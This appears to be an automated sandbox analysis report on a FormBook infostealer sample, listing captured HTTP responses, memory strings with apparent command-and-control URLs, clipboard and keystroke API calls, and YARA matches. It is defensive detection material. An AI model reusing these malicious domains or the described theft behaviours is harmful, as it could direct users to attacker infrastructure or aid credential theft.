Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: F-WEBDate: Sat, 11 Jan 2025 01:51:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 910Connection: closeFAI-W-FLOW: 91039038Service-Lane: e8594f12d42b28ee5775cc58b9d2e933FAI-W-AGENT_AID: 32663896Update-Time: 1736399500Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Frame-Options: SAMEORIGINSet-Cookie: _cliid=7VDhO9R4znWeM93n; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 01:51:45 GMT; HttpOnlySet-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 01:51:45 GMT; HttpOnlyData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 3c 64 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Connection: closeDate: Sat, 11 Jan 2025 01:51:44 GMTContent-Length: 910X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-Download-Options: noopenX-XSS-Protection: 1; mode=blockCache-Flow: 319010181Origin-Agent-Cluster: ?0FAI-W-FLOW: 91201038FAI-W-AGENT-AID: 32663896Service-Lane: e8594f12d42b28ee5775cc58b9d2e933P3P: CP=CAO PSA OURX-Permitted-Cross-Domain-Policies: noneServer: F-WEBData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 20 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 22 3e 34 30 34 3a 20 e6 82 a8 e8 ae bf e9 97 ae e7 9a 84 e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 e3 80 82 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 42 75 74 74 6f 6e 22 3e 0a 0a 09 09 09 3c 61 20 68 72 65 66 3d 27 2f 27 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 6c Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 01:51:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 01:51:56 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 01:51:58 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 01:52:01 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: TCRjLpECkFbdcm.exe, 00000004.00000002.3337678767.0000000004D66000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 00000005.00000002.3335326583.0000000005826000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://aballanet.cat/6xrr/?T0JX6z9=HxJAUmNG5a
Source: mobsync.exe, 00000005.00000002.3336943612.0000000007B10000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3335326583.0000000005B4A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.canadavinreport.site/g3h7/?T0JX6z9=dyqW
Source: TCRjLpECkFbdcm.exe, 00000004.00000002.3337678767.0000000004BD4000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 00000005.00000002.3335326583.0000000005694000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2031668617.0000000006BB4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: TCRjLpECkFbdcm.exe, 00000004.00000002.3339063922.0000000006CA1000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.zkdamdjj.shop
Source: TCRjLpECkFbdcm.exe, 00000004.00000002.3339063922.0000000006CA1000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.zkdamdjj.shop/kf1m/
Source: mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mobsync.exe, 00000005.00000002.3336943612.0000000007B10000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3335326583.0000000006000000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://down-sz.trafficmanager.net/?hh=
Source: mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mobsync.exe, 00000005.00000002.3333421133.0000000002E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth
Source: mobsync.exe, 00000005.00000002.3333421133.0000000002E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: mobsync.exe, 00000005.00000002.3333421133.0000000002E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: mobsync.exe, 00000005.00000003.1920595870.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: mobsync.exe, 00000005.00000002.3333421133.0000000002E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: mobsync.exe, 00000005.00000002.3333421133.0000000002E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: mobsync.exe, 00000005.00000002.3333421133.0000000002E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033B
Source: mobsync.exe, 00000005.00000002.3333421133.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3333421133.0000000002E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: mobsync.exe, 00000005.00000002.3333421133.0000000002E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_004B4164

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_004B4164

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004B3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_004B3F66

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004A001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_004A001C

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004CCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_004CCABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3334269313.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1736577132.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1736053839.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3332853744.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1736619988.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3334225307.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3334427443.0000000003BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00443B3A
Source: AxKxwW9WGa.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: AxKxwW9WGa.exe, 00000000.00000000.1479092972.00000000004F4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_dfc79f96-0
